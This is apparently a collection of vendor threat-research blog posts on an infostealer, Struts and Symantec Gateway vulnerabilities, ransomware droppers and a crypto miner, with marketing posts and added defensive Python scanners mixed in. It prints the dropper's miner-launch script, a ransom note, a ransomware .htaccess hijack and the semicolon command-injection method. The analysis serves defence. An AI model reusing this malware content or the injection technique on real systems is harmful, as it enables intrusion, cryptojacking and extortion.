Cashandler.A: New variant family of InfoStealer Trojan actively spreading in the wild.

The SonicWall Capture Labs Threat Research team has received reports of a new variant family of InfoStealer Trojan [GAV: Cashandler.A] actively spreading in the wild.

Cashandler gathers confidential information from the infected computer, such as login details, passwords and financial information, and sends it to its own C&C server.

Infection Cycle:

The Malware adds the following files to the system:

The Trojan adds the following keys to the Windows registry startup:

Once the computer is compromised, the malware copies its own executable file to the Temp folder and runs the following commands:

The malware’s goal is to collect as much data as possible: the attacker’s profit depends on how much user information is collected, so more data means higher profits.

The malware also performs keylogging and steals clipboard data from the target, saving both in the following registry key:

During our research we noticed that the hackers used a free Yahoo email account for their malware, and we were able to retrieve their credentials because they were hard-coded into the malware. Once the credentials were decrypted, we were able to access the hackers’ email account.

Command and Control (C&C) Traffic

Cashandler performs C&C communication over HTTP protocol.

The malware sends the victim’s computer information to its C&C server in the following format; here is an example:

SonicWall Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Cashandler.A (Trojan)

Apache Struts 2 CVE-2017-9805 Remote Code Execution

A critical vulnerability, CVE-2017-9805 (S2-052), in Apache Struts 2 has been reported by security researchers from lgtm.com. The vulnerability lies in the XStreamHandler used by the REST plugin: when deserializing an XML-formatted request, XStream did not filter the types (classes) it instantiates. An attacker can send a specially crafted XML payload to the target server and execute arbitrary code with the privileges of the current service.

A PoC for this vulnerability is already in the wild. Sending the following payload with a Content-Type of application/xml causes calc.exe to be executed on the target host.

0 …[truncated]…/Applications/Calculator.app/Contents/MacOS/Calculator…[truncated]…

In this PoC, the “map” class contributes the dangerous methods.

In the patch code on GitHub (http://bit.ly/2eRD33v), a whitelist is applied to the XML data to prevent malicious classes and methods from being brought in during processing.

The filter is added before XStream.fromXML is called.
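The allowlist idea behind that patch, as an added Python illustration (not the Struts or XStream code): before a request body reaches the deserializer, every element name is checked against the set of types the endpoint is expected to receive, and anything else, including `map` and dotted Java class names, is refused. The allowed names and both request bodies are constructed for the example.

```python
import xml.etree.ElementTree as ET

# Constructed allowlist: the element (type) names a hypothetical /orders
# endpoint is expected to deserialize. Anything not listed is refused before
# deserialization ever runs, which is the effect the Struts patch has.
ALLOWED_TYPES = {"order", "id", "customer", "name", "items", "item", "sku", "qty"}


def offending_types(xml_body: str) -> list:
    """Return the element names in xml_body that are not on the allowlist.

    Every element is checked, not only the root, because the S2-052 payload
    nests the dangerous types several levels below the root element.
    Unparsable XML is reported as a single synthetic entry.
    """
    try:
        root = ET.fromstring(xml_body)
    except ET.ParseError:
        return ["<unparsable>"]
    bad = []
    for el in root.iter():
        tag = el.tag.split("}")[-1]  # drop any namespace prefix
        # A dot in a tag is how XStream spells a fully qualified Java class.
        if tag not in ALLOWED_TYPES or "." in tag:
            bad.append(tag)
    return bad


def accept_body(xml_body: str) -> bool:
    """Allowlist gate: True only when every element name is expected."""
    return not offending_types(xml_body)


# Constructed benign request body for the hypothetical /orders endpoint.
BENIGN = """<order>
  <id>1001</id>
  <customer><name>Alice</name></customer>
  <items><item><sku>A-1</sku><qty>2</qty></item></items>
</order>"""

# Constructed shape of a hostile body: a "map" root carrying a class name the
# endpoint never asked for (a placeholder name, not a real gadget class).
HOSTILE = """<map>
  <entry>
    <some.vendor.PlaceholderType><arg>x</arg></some.vendor.PlaceholderType>
  </entry>
</map>"""

if __name__ == "__main__":
    print("benign accepted :", accept_body(BENIGN))
    print("hostile rejected:", not accept_body(HOSTILE), offending_types(HOSTILE))
```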

SonicWALL customers are protected against this threat via the following signature:

  • IPS 12968 Apache Struts 2 Insecure Deserialization

SonicWall CEO Bill Conner Wins Inaugural SC Media 2017 Reboot Leadership Award

Bill Conner has dedicated his entire career to technology and cybersecurity. It’s a mission that is rightfully acknowledged — not only via customer confidence, partner growth and upward revenue, but also industry accolades.

A new addition to SonicWall’s achievements the past year, Conner is the newest recipient of the inaugural SC Media Reboot Leadership Award. He is one of only six other elite executives honored in the publication’s top management category.

“Cybersecurity is more than technology. It’s an organic and ongoing collaboration that requires tools, skill and awareness at all levels,” said Conner. “This award is a byproduct of the dedication, support and trust in our global teams, partners, distributors and end customers. This is just the beginning of SonicWall’s renewed, aggressive and focused approach to keep customers and business safe from both known and unknown cyber threats.”

The SC Media Reboot Leadership Awards 2017 are an extension of SC Media’s Reboot edition. They are the first in what will be an ongoing awards program that enables SC Media to honor executives and professional leaders for their unique, inventive and inspiring contributions that improve security, shape the industry, provide thought leadership and otherwise have a positive impact on cybersecurity.


The SC Media Reboot Leadership honorees were selected based on how they changed the practice or understanding of cybersecurity for the better. The awards were organized in nine different categories, including influencers, thought leaders, top management, threat seekers, chief information officers, chief privacy officers, outstanding freshmen, outstanding educator and rising stars.

Joining SonicWall in November 2016, Conner has helped galvanize the company via new products and services, commitment to partner channels and increased global awareness.

In June, SonicWall announced the company surpassed 3 million firewalls sold and achieved 50 percent growth in partner deal registrations, reflecting more than $250 million in new pipeline. SonicWall collected 19 industry awards for its strategy, portfolio and leadership since becoming an independent company in November 2016 and Conner was announced CEO.

“Bill has been a tireless advocate for addressing cybersecurity threats through countless engagements with Capitol Hill, the media, and in the private sector when counseling the nation’s business leaders,” Michael Chertoff, Chairman of the Chertoff Group and the former U.S. Secretary of Homeland Security told SC Magazine.

In early August, CRN recognized SonicWall’s momentum and named Conner one of the top-25 most influential executives of 2017.

“The top executive has had partners cheering, as the now stand-alone network security vendor launched its new partner-focused strategy and key new technologies — like Capture Advanced Threat Protection — to bring enterprise-grade security solutions to SMB partners and customers,” CRN noted in the award profile.

Symantec Messaging Gateway Remote Command Execution Vulnerability

Symantec Messaging Gateway, formerly known as Brightmail, is a Linux-based anti-spam/security product for e-mail servers. It is deployed as a physical appliance or as an ESX virtual machine, in close proximity to the servers it is designed to protect.

A remote command execution vulnerability has been reported in Symantec Messaging Gateway. It is caused by a lack of proper validation of user input in the performRestore method, combined with a web authentication bypass bug in the notificationLogin() method of LoginAction. A remote attacker can exploit this by sending specially crafted HTTP requests to the target server; a successful attack executes arbitrary commands as the administrative user.

The authentication bypass vulnerability:

This vulnerability is due to an insufficient privilege check when the notificationLogin method in LoginAction.class is called.

The public methods in LoginAction class can be reached via unauthenticated web requests. For example, a GET request to `/brightmail/action1.do?method=method_name` will trigger LoginAction.method_name.

When the method `LoginAction.notificationLogin` is called from such a request, the following logic will be executed:

  1. Decrypts the `notify` parameter using `BrightmailDecrypt.decrypt`
  2. Creates a new `UserTO` object using the decrypted `notify` value as the email address
  3. Creates a new session, invalidating the old one if necessary
  4. Sets the `user` attribute of the newly created session to the constructed UserTO object

In step 4, a new session with a “user” attribute is created. The application treats such a session as authenticated, which results in an authentication bypass.

The remote command execution vulnerability:

The previous vulnerability allows an attacker to call methods that require an authenticated session. RestoreAction.performRestore is one of them; it takes two parameters: restoreSource and localBackupFilename.

In this method, the localBackupFilename parameter is eventually passed to a command executed by the “bmagent” service listening on port 41002:

      /opt/Symantec/Brightmail/cli/sbin/db-restore -F

If the filename contains a “;”, the part after the semicolon is executed as a shell command.

To exploit this vulnerability successfully, a CSRF token is needed. The vulnerability reporter found that the /brightmail/common.jsp file sets this token, which is valid for all requests.
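An added example (not from the advisory or from Symantec) showing what a defender can do with the details above: a strict validator for `localBackupFilename`, and a scan of constructed access-log lines that flags the unauthenticated `notificationLogin` call and a `performRestore` whose filename carries shell metacharacters. The action path used for performRestore and the log line format are assumptions.

```python
import re
from urllib.parse import unquote_plus, urlsplit

# Characters that must never reach a value spliced into a command line such
# as "db-restore -F <localBackupFilename>".
SHELL_META = re.compile(r"[;&|`$<>\r\n\\]")


def is_safe_backup_filename(name: str) -> bool:
    """Strict allowlist: a plain basename of safe characters, no traversal."""
    return bool(re.fullmatch(r"[A-Za-z0-9._-]{1,128}", name)) and ".." not in name


def parse_query(query: str) -> dict:
    """Split only on '&' so a ';' inside a value survives (parse_qs on older
    Pythons treats ';' as a separator, which would hide the injection)."""
    out = {}
    for part in query.split("&"):
        if "=" in part:
            key, value = part.split("=", 1)
            out[unquote_plus(key)] = unquote_plus(value)
    return out


# Assumed log shape: <ip> "<METHOD> <url> HTTP/1.x" <status>
REQUEST_RE = re.compile(r'"(?:GET|POST) (\S+) HTTP/1\.[01]"')


def classify_request(line: str) -> list:
    """Detection tags for one access-log line.

    auth-bypass   : LoginAction.notificationLogin reached via action1.do with
                    a 'notify' parameter (needs no authenticated session)
    cmd-injection : performRestore whose localBackupFilename is not a plain
                    basename or carries shell metacharacters
    """
    m = REQUEST_RE.search(line)
    if not m:
        return []
    url = urlsplit(m.group(1))
    qs = parse_query(url.query)
    tags = []
    if url.path.endswith("/action1.do") and qs.get("method") == "notificationLogin" and "notify" in qs:
        tags.append("auth-bypass")
    if qs.get("method") == "performRestore":
        fname = qs.get("localBackupFilename", "")
        if SHELL_META.search(fname) or not is_safe_backup_filename(fname):
            tags.append("cmd-injection")
    return tags


# Constructed sample log. The notify value is a placeholder and the
# /brightmail/action2.do path for RestoreAction is an assumption.
SAMPLE_LOG = """\
10.0.0.5 "GET /brightmail/action1.do?method=notificationLogin&notify=PLACEHOLDER HTTP/1.1" 302
10.0.0.5 "GET /brightmail/common.jsp HTTP/1.1" 200
10.0.0.5 "POST /brightmail/action2.do?method=performRestore&restoreSource=local&localBackupFilename=backup.tar;placeholder_cmd HTTP/1.1" 200
10.0.0.9 "POST /brightmail/action2.do?method=performRestore&restoreSource=local&localBackupFilename=backup-2017-08-30.tar HTTP/1.1" 200
"""


def scan(log_text: str) -> dict:
    """Map each flagged line number (1-based) to its detection tags."""
    hits = {}
    for n, line in enumerate(log_text.splitlines(), 1):
        tags = classify_request(line)
        if tags:
            hits[n] = tags
    return hits


if __name__ == "__main__":
    for n, tags in scan(SAMPLE_LOG).items():
        print(f"line {n}: {', '.join(tags)}")
```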

The SonicWall Threat Research Team has the following signature to protect customers from this type of attack:

  • IPS 12960: Symantec Messaging Gateway Remote Code Execution

Dropper trojan delivers Shade ransomware and ZCash crypto miner (Sep 1st, 2017)

The SonicWall Capture Labs Threat Research Team has observed a dropper Trojan that drops ransomware as well as crypto-mining software. In this case, a variant of the Shade ransomware is dropped along with a coin miner that mines ZCash (ZEC).

Infection Cycle:

The Trojan makes the following DNS queries:

  • global-genom.com
  • webroshd.com
  • whatismyipaddress.com
  • whatsmyip.net
  • eu1-zcash.flypool.org

The Trojan drops the following files on to the filesystem:

  • %ALLUSERSPROFILE%\Application Data\SoftwareDistribution\nheqminer32.exe
  • %ALLUSERSPROFILE%\Application Data\SysWOW64\D8pedj.cmd
  • %ALLUSERSPROFILE%\Application Data\Windows\csrss.exe [Detected as GAV: Shade.RSM_5 (Trojan)]
  • %ALLUSERSPROFILE%\Desktop\README{1 to 10}.txt
  • %APPDATA%\CF4ED5F2CF4ED5F2.bmp
  • %TEMP%\FA375141.rtf

The Trojan adds the following keys to the registry:

  • HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run\Command Line Support “cmd.exe /C C:\DOCUME~1\ALLUSE~1\APPLIC~1\SysWOW64\D8pedj.cmd”
  • HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run\Client Server Runtime Subsystem “"C:\Documents and Settings\All Users\Application Data\Windows\csrss.exe"”

D8pedj.cmd contains the following script, which starts the miner:

      echo CreateObject("Wscript.Shell").Run "" ^& WScript.Arguments(0) ^& "", 0, False > "%TEMP%/QYHz1.vbs"
      && start /WAIT wscript.exe "%TEMP%/QYHz1.vbs" "C:\DOCUME~1\ALLUSE~1\APPLIC~1\SOFTWA~1\NHEQMI~1.EXE
      -l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.FA0F586A -t 1"
      && del "%TEMP%\QYHz1.vbs"
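As an added triage example (not part of the write-up), the following Python pulls the pool, wallet and worker id out of the miner command line above and flags the two Run-key entries on the grounds a defender would use in practice: launching from a user-writable data directory, wrapping a script in cmd.exe /C, and a core process name such as csrss.exe living outside System32. The Run entries and command line are reconstructed from the values above, with one benign entry added for contrast.

```python
import re

# Constructed reproduction of the miner launch line from the dropped D8pedj.cmd
# (values from the write-up; backslashes doubled for the Python string).
DROPPER_CMD = (
    'start /WAIT wscript.exe "%TEMP%/QYHz1.vbs" '
    '"C:\\DOCUME~1\\ALLUSE~1\\APPLIC~1\\SOFTWA~1\\NHEQMI~1.EXE '
    '-l eu1-zcash.flypool.org:3333 -u t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep.FA0F586A -t 1" '
    '&& del "%TEMP%\\QYHz1.vbs"'
)

# Constructed Run-key entries (key, value name, data): the two from the
# write-up plus one benign entry for contrast.
RUN_ENTRIES = [
    (r"HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Run",
     "Command Line Support",
     r"cmd.exe /C C:\DOCUME~1\ALLUSE~1\APPLIC~1\SysWOW64\D8pedj.cmd"),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "Client Server Runtime Subsystem",
     r'"C:\Documents and Settings\All Users\Application Data\Windows\csrss.exe"'),
    (r"HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Run",
     "SecurityHealth",
     r"C:\Windows\System32\SecurityHealthSystray.exe"),
]

# Core Windows process names that legitimately run only from \Windows\System32.
SYSTEM_PROCESS_NAMES = {"csrss.exe", "lsass.exe", "services.exe", "svchost.exe", "winlogon.exe"}
# User-writable data directories (long and 8.3 forms) an autorun should not launch from.
DATA_DIRS = ("\\application data\\", "\\programdata\\", "\\applic~1\\", "\\appdata\\", "\\temp\\")

# nheqminer style arguments: -l pool:port -u wallet.worker -t threads
MINER_ARGS = re.compile(r"-l\s+(?P<host>[\w.-]+):(?P<port>\d+)\s+-u\s+(?P<user>\S+)\s+-t\s+(?P<threads>\d+)")


def miner_indicators(cmd_line: str) -> dict:
    """Pool, wallet, worker id and thread count from the miner command line, or {}."""
    m = MINER_ARGS.search(cmd_line)
    if not m:
        return {}
    wallet, _, worker = m.group("user").partition(".")
    return {
        "pool_host": m.group("host"),
        "pool_port": int(m.group("port")),
        "wallet": wallet,
        "worker": worker,
        "threads": int(m.group("threads")),
        # The launcher deletes its own VBS helper once the miner is started.
        "self_deleting_vbs": bool(re.search(r'del\s+"%TEMP%[\\/][^"]+\.vbs"', cmd_line, re.I)),
    }


def flag_run_entry(data: str) -> list:
    """Reasons an autorun value resembles the dropper's persistence; [] if it looks ordinary."""
    low = data.lower()
    reasons = []
    if any(d in low for d in DATA_DIRS):
        reasons.append("launches from a user-writable data directory")
    if low.lstrip('"').startswith("cmd.exe /c"):
        reasons.append("cmd.exe /C wrapper around a script")
    for name in re.findall(r"([\w~-]+\.exe)", low):
        if name in SYSTEM_PROCESS_NAMES and "\\windows\\system32\\" not in low:
            reasons.append(f"{name} outside System32")
    return reasons


def triage(entries) -> dict:
    """Value name -> reasons, for every Run entry that raised at least one reason."""
    return {name: flag_run_entry(data) for _, name, data in entries if flag_run_entry(data)}


if __name__ == "__main__":
    print(miner_indicators(DROPPER_CMD))
    for name, reasons in triage(RUN_ENTRIES).items():
        print(name, "->", "; ".join(reasons))
```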

README{1 to 10}.txt contains the following text:

      All the important files on your computer were encrypted.
      To decrypt the files you should send the following code:
      0E7F1123D9BE734AF274|0
      to e-mail address gervasiy.menyaev@gmail.com.
      Then you will receive all necessary instructions.
      All the attempts of decryption by yourself will result only in irrevocable loss of your data.
      If you still want to try to decrypt them by yourself please make a backup at first because
      the decryption will become impossible in case of any changes inside the files.
      If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
      use the feedback form. You can do it by two ways:
      1) Download Tor Browser from here:
      https://www.torproject.org/download/download-easy.html.en
      Install it and type the following address into the address bar:
      http://cryptsen7fo43rr6.onion/
      Press Enter and then the page with feedback form will be loaded.
      2) Go to the one of the following addresses in any browser:
      http://cryptsen7fo43rr6.onion.to/
      http://cryptsen7fo43rr6.onion.cab/

The Trojan contacts whatsmyip.net to obtain the machine’s external IP address:

The Trojan downloads the Shade ransomware binary, document_082017_6401df.exe [Detected as GAV: Shade.RSM_5 (Trojan)]:

Once executed, it displays CF4ED5F2CF4ED5F2.bmp on the desktop background:

It also displays the following Russian-language text file, FA375141.rtf:

The Trojan encrypts files on the system and renames them to {encrypted filename}.crypted000007.

In addition to the ransomware, a crypto miner is also dropped onto the system. Rather than mining Bitcoin, it mines ZCash (ZEC), worth $283 USD per ZEC at the time of writing. nheqminer32.exe can be seen running in the process list:

The address accumulating the rewards is t1L9iBXyRgaYrQ5JSTSdstopV6pHtZ2Xdep. Mining activity can be observed by visiting the zcash.flypool.org website:

SonicWALL Gateway AntiVirus provides protection against this threat via the following signature:

  • GAV: Dropper.RSM_6 (Trojan)
  • GAV: Shade.RSM_5 (Trojan)

SonicWall Expands Scalability of its Next-Generation Firewall Platforms and DPI SSL to Address Encrypted Threats

Day after day, the number of users is growing on the web, and so is the number of connections. At the same time, so is the number of cyberattacks hidden by encryption. SonicWall continues to tackle the encrypted threat problem by expanding the number of SSL/TLS connections that it can inspect for ransomware.

Today, a typical web browser keeps 3-5 connections open per tab, even if the window is not the active browser tab. The number of connections can easily increase to 15 or 20 if the tab runs an online app like Microsoft SharePoint, Office web apps, or Google Docs. In addition, actions such as loading or refreshing the browser page may temporarily spike another 10-50 connections to retrieve various parts of the page. A good example of this scenario is an advertisement-heavy webpage, which can really add connections if the user has not installed an ad blocker plugin. Also keep in mind that many ad banners in web pages embed code to auto-refresh every few seconds, even if the current tab is inactive or minimized. That said, it makes a lot of difference how many browser tabs your users typically keep open continuously during the day and how refresh-intensive those pages are.

We can make some assumptions on the average number of connections for different types of users. For example, light web users may use an average of 30-50 connections, with a peak connection count of 120-250. On the other hand, heavy consumers may use twice that, for up to 500 simultaneous connections.

If a client is using BitTorrent on a regular basis that alone will allocate at least 500 connections for that user (with the possibility to consume 2,000+ connections). For a mainstream organization it is safe to assume that on average 80% of the users are considered as light consumers, whereas the remaining 20 percent are heavy consumers. The above numbers will provide a ballpark of a few hundred thousand connections for a company of 1,000 employees – 3 to 5 times higher than the number of connections for the same organization a decade ago.

With all the changes in browser content delivery and presentation, as well as users’ advanced manipulation of the web and its content, it’s necessary for SonicWall to address the forever increasing demand in the number of connections to satisfy the customer need and provide them with a better user experience. In the recently released SonicOS 6.2.9 for SonicWall next-gen firewalls, our engineering team has increased the number of stateful packet inspection (SPI) and deep packet inspection (DPI) connections to better serve this need.

Below is the new connection count for Stateful Packet Inspection connections for SonicWall Gen6 Network Security Appliance (NSA) and SuperMassive Series firewalls in the new SonicOS 6.2.9 when compared to the same count in the previous 6.2.7.1:

SPI Connection Chart

In addition, the number of DPI connections has increased up to 150 percent on some platforms. Below is a comparison of the new connection count in SonicOS 6.2.9 against SonicOS 6.2.7.1.
DPI Connection Chart

Finally, for security-savvy network administrators we have provided a lever to increase the maximum number of DPI-SSL connections by foregoing a number of DPI connections. Below is a comparison of the default and maximum number of DPI-SSL connection by taking advantage of this lever.

Increase Max DPI SSL Connections Chart

We also enhanced our award-winning Capture ATP cloud sandbox service by improving the user experience of the “Block Until Verdict” feature, which prevents suspicious files from entering the network until the sandboxing technology finishes its evaluation.

In addition, SonicOS 6.2.9 enables Active/Active clustering (on NSA 3600 and NSA 4600 firewalls), as well as enhanced HTTP/HTTPS redirection.

Whether your organization is a startup of 50 users or an enterprise of few thousand employees, SonicWall is always considering its customers’ needs and strives to better serve you by constantly improving our feature set and offerings.

For all of the feature updates in SonicOS 6.2.9, please see the latest SonicOS 6.2.9 data sheet(s). Upgrade today.

Hackers Attack Websites with Ransomware – August 2017

SonicWALL Threat Research Labs recently received reports of attackers targeting websites with ransomware. Attackers are uploading malicious PHP files onto the websites. These PHP files allow the attacker to encrypt the website’s files and then extort money from the site’s owner.

Once the file is uploaded, the attacker connects to the ransomware via a web browser, as follows:

The attacker can then submit a complex encryption key to encrypt the site’s content. This results in:

The malware overwrites the .htaccess file with the following contents:

      #Bug7sec Team
      DirectoryIndex shor7cut.php
      ErrorDocument 404 /shor7cut.php

This redirects the website to the file shor7cut.php.

In addition, the ransomware traverses the directory tree searching for files to encrypt. Each file’s contents are encrypted using PHP’s mcrypt function, and the file is then renamed with the .shor7cut extension.
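An added example, not from the write-up, of how a site owner could check a webroot for this infection: it reports `DirectoryIndex`/`ErrorDocument` targets in .htaccess that point at an unexpected script and lists files carrying the .shor7cut extension. The sample webroot is constructed in a temporary directory with placeholder file bodies.

```python
import os
import re
import tempfile

RANSOM_EXT = ".shor7cut"
# DirectoryIndex <file> and ErrorDocument <code> <target> are the two
# directives the ransomware rewrites to route every request to its own script.
HIJACK_DIRECTIVES = re.compile(r"^\s*(DirectoryIndex|ErrorDocument\s+\d{3})\s+(\S+)", re.M)


def htaccess_findings(text: str, expected=("index.php", "index.html")) -> list:
    """(directive, target) pairs whose target is not one of the site's expected index files."""
    findings = []
    for m in HIJACK_DIRECTIVES.finditer(text):
        directive, target = m.group(1).split()[0], m.group(2)
        if os.path.basename(target) not in expected:
            findings.append((directive, target))
    return findings


def scan_webroot(root: str) -> dict:
    """Walk the webroot; collect .shor7cut files and hijacked .htaccess directives."""
    result = {"encrypted_files": [], "htaccess": {}}
    for dirpath, _, files in os.walk(root):
        for name in files:
            path = os.path.join(dirpath, name)
            rel = os.path.relpath(path, root)
            if name.endswith(RANSOM_EXT):
                result["encrypted_files"].append(rel)
            elif name == ".htaccess":
                with open(path, encoding="utf-8", errors="replace") as fh:
                    hits = htaccess_findings(fh.read())
                if hits:
                    result["htaccess"][rel] = hits
    return result


def build_sample_webroot() -> str:
    """Constructed webroot mimicking the aftermath described above (placeholder bodies)."""
    root = tempfile.mkdtemp(prefix="webroot_")
    with open(os.path.join(root, ".htaccess"), "w") as fh:
        fh.write("#Bug7sec Team\nDirectoryIndex shor7cut.php\nErrorDocument 404 /shor7cut.php\n")
    os.makedirs(os.path.join(root, "uploads"))
    for name in ("index.php.shor7cut", "uploads/photo.jpg.shor7cut", "uploads/notes.txt"):
        with open(os.path.join(root, name), "wb") as fh:
            fh.write(b"placeholder")
    return root


def sample_report() -> dict:
    """Build the constructed webroot and scan it."""
    return scan_webroot(build_sample_webroot())


if __name__ == "__main__":
    print(sample_report())
```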

Once the malware is done encrypting, it sends an email to the attacker containing the encryption key used:

Once the site owner pays the ransom, the attacker goes back to the ransomware PHP page and chooses the “DeInfection” option:

After the appropriate key is entered, the ransomware restores the files:

The SonicWALL Threat Research Team has the following signatures to protect customers from this type of attack:

  • GAV 17970: Ronggolawe.RSM
  • WAF 1669: Ronggolawe.RSM

SyncCrypt Ransomware hides behind an image file

This week, the SonicWall Capture Labs Threat Research team has received reports of yet another ransomware being distributed via spam. The email purports to be an urgent and important message with a document attached, but the attachment is in fact a zip archive containing a Windows Script file (.wsf). Once executed, the script downloads a seemingly non-malicious image file and then installs a ransomware called SyncCrypt.

Infection Cycle:

Upon execution, it downloads a jpg file, as seen in the snippet of JavaScript code below:

Downloading the jpg file from the sources above yields this innocuous-looking file:

On closer examination, however, this jpg file turns out to be an archive containing the ransomware components.

These files are then unpacked and saved in the following location:

  • %temp%/BackupClient/sync.exe [Detected as GAV: SyncCrypt.RSM (Trojan) ]
  • %temp%/BackupClient/readme.html
  • %temp%/BackupClient/readme.png
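An added example, not part of the original post, of how such an image can be examined: Python's zipfile locates the end-of-central-directory record from the tail of the data and ignores leading bytes, so a JPEG header with a ZIP appended still opens as an archive, and the member list gives away the payload. The sample file is constructed (placeholder member contents, with the file names from the list above).

```python
import io
import zipfile

JPEG_SOI = b"\xff\xd8\xff"   # JPEG start-of-image marker
ZIP_EOCD = b"PK\x05\x06"     # ZIP end-of-central-directory signature


def looks_like_jpeg(data: bytes) -> bool:
    """Header check only: what a casual viewer or a naive content filter sees."""
    return data.startswith(JPEG_SOI)


def embedded_zip_members(data: bytes) -> list:
    """Member names of a ZIP archive reachable from the tail of the data, else [].

    zipfile finds the end-of-central-directory record by scanning back from
    the end and tolerates arbitrary leading bytes, which is exactly why an
    image with an archive appended still unpacks cleanly.
    """
    if ZIP_EOCD not in data:
        return []
    try:
        with zipfile.ZipFile(io.BytesIO(data)) as zf:
            return zf.namelist()
    except zipfile.BadZipFile:
        return []


def classify(data: bytes) -> str:
    """'jpeg-zip-polyglot' when both a JPEG header and a usable ZIP tail are present."""
    is_jpeg, members = looks_like_jpeg(data), embedded_zip_members(data)
    if is_jpeg and members:
        return "jpeg-zip-polyglot"
    if is_jpeg:
        return "jpeg"
    if members:
        return "zip"
    return "unknown"


def build_sample_polyglot() -> bytes:
    """Constructed sample: a JFIF-looking prefix followed by a ZIP whose member
    names mirror the dropped files; the member contents are placeholders."""
    prefix = JPEG_SOI + b"\xe0\x00\x10JFIF\x00" + b"\x00" * 64
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w", zipfile.ZIP_DEFLATED) as zf:
        zf.writestr("BackupClient/sync.exe", b"PLACEHOLDER - not a real binary")
        zf.writestr("BackupClient/readme.html", b"<html>placeholder</html>")
        zf.writestr("BackupClient/readme.png", b"placeholder")
    return prefix + buf.getvalue()


if __name__ == "__main__":
    sample = build_sample_polyglot()
    print(classify(sample), embedded_zip_members(sample))
```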

It then tries to confuse the victim by displaying this error message after the script runs:

Meanwhile, the ransomware encrypts the victim’s files as usual and appends .KK to every encrypted file. The ransom note with payment instructions is then displayed, as shown in the figure below:

Because of the prevalence of these types of malware attacks, we urge our users to back up their files regularly.

SonicWALL Gateway AntiVirus provides protection against this threat with the following signatures:

  • GAV: SyncCrypt.RSM (Trojan)
  • GAV: WScript.SyncCrypt.RSM (Trojan)

SonicWall and Dell EMC: A Strategic Partnership Providing Network Security Solutions to Stay Ahead of the Cyber Arms Race

I am pleased to announce that Dell EMC is now shipping the OEM version of the SonicWall next-generation cyber security firewall solutions in the United States and Canada. Continuing our long-time partnership and resale relationship, Dell EMC will offer the powerful combination of SonicWall’s innovative threat protection technology and Dell EMC’s broad set of solutions from the data center all the way to endpoint devices.

Organizations today are looking to transform their business to drive IT innovation, enhance workforce mobility and reduce risk. However, digital transformation can increase exposure to risks that can directly impact an organization’s data, reputation, and credibility.

Addressing customers’ security needs as they move to the cloud, extend their network and storage solutions, and migrate to more mobile and IoT environments is critical in today’s threat landscape. The combination of Dell EMC solutions and SonicWall is a great value add to Dell EMC customers and the partner community.

Here are some key points on the OEM:

SonicWall next-generation firewalls provide effective threat prevention through a layered approach on top of our multi-engine cloud-based SonicWall Capture Advanced Threat Protection Service. This solution protects organizations from today’s most insidious threats including ransomware, encrypted malware, mobile threats and email-borne attacks.

The SonicWall OEM security solution is a critical affirmation of how important the Dell EMC – SonicWall partnership is for their large customer base and their Dell EMC Partner Program members.

For additional information, please see the following press release – https://www.sonicwall.com/en-us/about-sonicwall/news/press-releases/pr-articles/sonicwall-and-dell-emc-announce-oem-launch-of-next

Connecting and Protecting the Remote Islands of Corporate IT – BYOD and Mobility

How Dell and SonicWall’s SMA and Next-Generation Firewall solution builds secure virtual bridges for today’s fragmented environments

As employees are no longer restricted to the physical structures of their company headquarters, what and how they connect to their corporate network presents a multitude of challenges. Corporate IT environments consist of a seemingly uncontrollable combination of devices, operating systems, and geographic locations. Securely connecting all of these is one of the most crucial IT initiatives companies are faced with as Gartner reports that 70% of mobile professionals will conduct their work on personal smart devices by 2018.

As we are all well aware, all endpoints pose significant threats to network security. Specifically, BYOD consumer devices are usually the most difficult to manage and secure. Data loss or leakage and unauthorized access or transmission are a constant concern. Mobile devices can also retain sensitive or proprietary data while wirelessly connected to the corporate network. White-listing apps for distribution on iOS and Android platforms helps lock down mobile devices, but unmanaged laptops require greater endpoint control via the VPN.

What can you do to protect it all?

Dell and SonicWall’s VPN and Next-Generation Firewall solution delivers a layered defense strategy to ensure employees have the access they need while providing the security the company requires.

Components of a VPN and Next-Generation Firewall Solution:

  • Secure Mobile Access (SMA) Appliances – Provide mobility and secure access for up to 20,000 concurrent users from a single, powerful, and granular access control engine.
  • Next-Generation Firewalls – Network security, control, and visibility through sandboxing, SSL inspection, intrusion prevention, anti-malware, application identification, and content filtering.
  • Remote Access Management & Reporting – Powerful, web-based remote IT management platform to streamline appliance management and provide extensive reporting.
  • VPN Clients/Mobile Connect – Simple, policy-enforced secure access to mission-critical applications and data for iOS, OS X, Android, Chrome OS, Kindle Fire, and Windows mobile devices.

Deploying a SonicWall VPN and Next-Generation Firewall solution provides multi-layered protection that can authorize, decrypt, and remove threats from SSL VPN traffic before it enters the network environment. The dual protection of a SonicWall SMA and Next-Generation Firewall is critical to ensuring the security of both VPN access and traffic. SonicWall’s remote access management and reporting also allows organizations to view, define, and enforce how application and bandwidth assets are used.

Securely connecting your workforce, partners, and customers has never been more important. Reach out to your Dell and SonicWall contacts today to learn what implementing a SonicWall VPN and Next-Generation Firewall solution can mean for the future of your company.